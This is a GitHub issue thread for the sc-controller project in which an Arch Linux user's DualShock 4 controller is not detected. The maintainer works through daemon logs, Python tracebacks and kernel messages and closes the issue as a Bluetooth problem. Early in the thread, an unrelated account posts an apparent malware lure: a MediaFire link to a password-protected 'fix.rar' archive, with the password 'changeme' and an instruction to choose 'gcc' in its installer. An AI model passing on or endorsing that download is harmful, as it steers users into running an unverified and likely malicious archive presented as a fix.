C0rn3j/sc-controller #13: Failed to determine controller device

elogicuk, 2024-08-27:
Please help sc controller no longer works for me on arch linux :(

`scc-daemon debug
D SCCDaemon     Starting SCCDaemon...
D SCCDaemon     Initializing drivers...
W SCCDaemon     Skipping disabled driver 'ds5drv'
W SCCDaemon     Skipping disabled driver 'fake'
W SCCDaemon     Skipping disabled driver 'remotepad'
D USB           Registered USB driver for 054c:09cc
D USB           Registered USB driver for 054c:05c4
D USB           Registered USB driver for 28de:1102
D USB           Registered USB driver for 28de:1142
D USB           Registered USB driver for 28de:1205
D Mapper        Creating virtual devices
D Mapper        Keyboard: <scc.uinput.Keyboard object at 0x7ac7f692b5f0>
D Mapper        Mouse:    <scc.uinput.Mouse object at 0x7ac7f6fd7980>
D Mapper        Gamepad:  <scc.uinput.UInput object at 0x7ac7f6948530>
D SCCDaemon     Created control socket /home/home/.config/scc/daemon.socket
D SCCDaemon     Connected to XServer :1
D asyncio       Using selector: EpollSelector
D OSD DaemonCtrl    Connected to daemon, version 0.4.8.13
D OSD DaemonCtrl    Daemon is ready.
I SCCDaemon     Registered scc-osd-daemon
I OSD osd.daemon    Sucessfully registered as scc-osd-daemon
W DS4           Failed to determine controller device
`

HarbingerOfFire, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

elogicuk, 2024-08-27:
\\\╰─λ scc gui
W ContImage     Area for button DOTS not found
W ContImage     Area for button DOTS not found
W App           Failed to read release notes
E App           g-io-error-quark: Not Found (1)
Traceback (most recent call last):
  File "/usr/lib/python3.12/site-packages/scc/gui/app.py", line 1559, in http_ready
    stream = f.read_finish(task)
             ^^^^^^^^^^^^^^^^^^^
gi.repository.GLib.GError: g-io-error-quark: Not Found (1)
W App           (above error is not fatal and can be ignored)

C0rn3j, 2024-08-27:
Looks like https://github.com/C0rn3j/sc-controller/issues/14 is causing this actually, now that it correctly links to this repo.

Change the mentioned file to say .18 for now and see if that fixes it.

elogicuk, 2024-08-27:
my actual problem is sc controller is not seeing my DS4 controller 

i wish i never upgraded my system is was working fine before :(

C0rn3j, 2024-08-27:
Does old version of sc-controller work? You can try the appimages for a quit test I suppose.

elogicuk, 2024-08-27:
no an older version does not work also

C0rn3j, 2024-08-27:
https://github.com/C0rn3j/sc-controller/blob/b21c73535d46bc58cf712f136298c3dad42ee69c/scc/drivers/ds4drv.py#L379

The relevant code is here.

You may want to try downgrading kernel (to let's say linux-lts since you're on Arch) and seeing if it works there.

Narrowing down which component that you updated caused this would help.

elogicuk, 2024-08-29:
i see something in my journal errors log 

Aug 29 14:43:24 home-ms7b17 kernel: playstation 0005:054C:09CC.000A: DualShock4 input CRC's check failed

C0rn3j, 2024-09-08:
That sounds like an issue with your system/controller unrelated to sc-controller.
My dmesg when connecting a (valid) chinese DS4 clone is as such:

```
[249217.027122] playstation 0005:054C:05C4.0025: unknown main item tag 0x0
[249217.027709] playstation 0005:054C:05C4.0025: hidraw8: BLUETOOTH HID v1.00 Gamepad [Wireless Controller] on ac:50:de:59:12:ca
[249217.311570] input: Wireless Controller as /devices/virtual/misc/uhid/0005:054C:05C4.0025/input/input62
[249217.311694] input: Wireless Controller Motion Sensors as /devices/virtual/misc/uhid/0005:054C:05C4.0025/input/input63
[249217.311749] input: Wireless Controller Touchpad as /devices/virtual/misc/uhid/0005:054C:05C4.0025/input/input64
[249217.311954] playstation 0005:054C:05C4.0025: Registered DualShock4 controller hw_version=0x00006404 fw_version=0x00007008
```

However it did not seem to work for me for a different reason, and now after adding it as a custom controller I can't even launch scc-daemon, so that's fun.

```
[1] % scc-daemon debug
D SCCDaemon     Starting SCCDaemon...
D SCCDaemon     Initializing drivers...
W SCCDaemon     Skipping disabled driver 'fake'
W SCCDaemon     Skipping disabled driver 'remotepad'
Traceback (most recent call last):
  File "/usr/bin/scc-daemon", line 36, in <module>
    main()
  File "/usr/bin/scc-daemon", line 32, in main
    daemon.debug()
  File "/usr/lib/python3.12/site-packages/scc/sccdaemon.py", line 1122, in debug
    self.run()
  File "/usr/lib/python3.12/site-packages/scc/sccdaemon.py", line 655, in run
    self.init_drivers()
  File "/usr/lib/python3.12/site-packages/scc/sccdaemon.py", line 98, in init_drivers
    if getattr(mod, "init")(self, cfg):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/scc/drivers/hiddrv.py", line 691, in init
    d = HIDDrv(daemon)
        ^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/scc/drivers/hiddrv.py", line 568, in __init__
    self.scan_files()
  File "/usr/lib/python3.12/site-packages/scc/drivers/hiddrv.py", line 604, in scan_files
    self.config_files[vid, pid] = config_file.decode("utf-8")
                                  ^^^^^^^^^^^^^^^^^^
AttributeError: 'str' object has no attribute 'decode'. Did you mean: 'encode'?
```

C0rn3j, 2024-09-08:
So, I fixed the utf-8 issue for custom controllers, will be available in next release.

I was able to instantly connect the controller via USB.

However, I was not able to connect my controller via BT, and when I added it as HIDRAW(default) instead of evdev, it produced further crashes on an assert that the device is already handled - this seems to be because DS4 hidraw is already there, so if you add it twice (which it lets you), it crashes that way.

Adding it via evdev made it work. So there's something wrong with the hidraw backend and it's not able to pick the controller up.

Again, your issue seems to be related to something else as you get told off immediately in the kernel log, which seems like a BT error.

Run `sudo dmesg -w`, connect the controller and post what shows up.

`D USB           Registered USB driver for 054c:05c4` but it does look like wired should be fine?

elogicuk, 2024-09-11:
Is working now, maybe i was using a bad usb cable i dont know?

[77136.234905] usb 1-9.2: new full-speed USB device number 13 using xhci_hcd
[77136.374979] usb 1-9.2: New USB device found, idVendor=054c, idProduct=09cc, bcdDevice= 1.00
[77136.374981] usb 1-9.2: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[77136.374983] usb 1-9.2: Product: Wireless Controller
[77136.374983] usb 1-9.2: Manufacturer: Sony Interactive Entertainment
[77136.412694] playstation 0003:054C:09CC.000A: hidraw9: USB HID v1.11 Gamepad [Sony Interactive Entertainment Wireless Controller] on usb-0000:00:14.0-9.2/input3
[77136.464430] input: Sony Interactive Entertainment Wireless Controller as /devices/pci0000:00/0000:00:14.0/usb1/1-9/1-9.2/1-9.2:1.3/0003:054C:09CC.000A/input/input24
[77136.464617] input: Sony Interactive Entertainment Wireless Controller Motion Sensors as /devices/pci0000:00/0000:00:14.0/usb1/1-9/1-9.2/1-9.2:1.3/0003:054C:09CC.000A/input/input25
[77136.464710] input: Sony Interactive Entertainment Wireless Controller Touchpad as /devices/pci0000:00/0000:00:14.0/usb1/1-9/1-9.2/1-9.2:1.3/0003:054C:09CC.000A/input/input26
[77136.464893] playstation 0003:054C:09CC.000A: Registered DualShock4 controller hw_version=0x00007404 fw_version=0x00008007

C0rn3j, 2024-09-20:
USB works fine but BT does not, you need to add a custom device for now, I presume you were trying BT in the original post, closing here in favor of https://github.com/C0rn3j/sc-controller/issues/22

closed 2024-09-20 by C0rn3j